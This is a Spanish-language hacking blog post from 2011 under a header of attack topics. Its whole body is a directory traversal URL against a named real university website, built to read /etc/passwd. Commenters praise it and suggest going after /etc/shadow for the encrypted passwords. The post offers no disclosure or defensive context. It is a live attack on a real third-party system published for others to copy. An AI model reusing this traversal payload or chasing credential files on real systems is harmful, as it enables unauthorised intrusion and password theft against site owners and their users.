http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd
Seguridad Informática, Antivirus, ARP Poisoning, BackTrack, Black Hat SEO, SQLi, Contraseñas, Cracking, DDOS, Defacing, Directory Traversal, Dorks, Exploits, Hashes, Ingeniería Social, Keyloggers, Malware, Metasploit, MITM, Moodle, Packers, Crypters, Parches, Pentesting, Phising, Rogueware, Seguridad Wireless, Session Hijacking, Shell, Sniffers, Spam, SslStrip, Troyanos, User-Agent Cloaking, Vulnerabilidades, XSS, 4n4lDetector, ParameterFuzz, Bypass Antivirus por Germán Sánchez Garcés.
Descubre 4n4lDetector Pro y Pescan.io
Analiza archivos de forma avanzada con 4n4lDetector Pro y prueba la versión online en Pescan.io. Todo desde tu navegador o tu escritorio.
Intelligent String para priorizar IOCs útiles, heurísticas de flujo anómalo, generación de reglas YARA con un clic, carving de encabezados PE, y detección de firmas Microsoft manipuladas. Compatible con 32/64-bit y formatos comunes (.exe, .dll, .sys, .ocx, .scr, .drv, .cpl). Funciona desde cualquier navegador o en tu escritorio con CLI, GUI y plataforma web integrada. Incluye hash intelligence, gamificación interna, Interest Words, y más de 10,000 reglas para detección avanzada de malware.
jueves, 10 de febrero de 2011
Escupiendo el Passwd de Unix
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd





Sos grande!
ResponderEliminar/etc/passwd no dice nada útil, lo que quieres sacar /etc/shadow
ResponderEliminarAnónimo@
ResponderEliminar¡Muchas gracias!
Anónimo(2)@
Encuentras toda la información sobre las cuentas de usuario del sistema. ¿Para quien no es útil?
Échale un vistazo en http://lubrin.org/dani/ch11.html en Shadow se encuentra el usuario y la contraseña cifrada.
Saludos!
O_o SQL inject is cream!
ResponderEliminarBueno
ResponderEliminarTe esmeras; estare en el camino de tu progreso, recogiendo las semillas de tu sabiduria!...
ResponderEliminarLa verdad se que aprendere de ti!.
Gracias! 8)
atte:Gazutec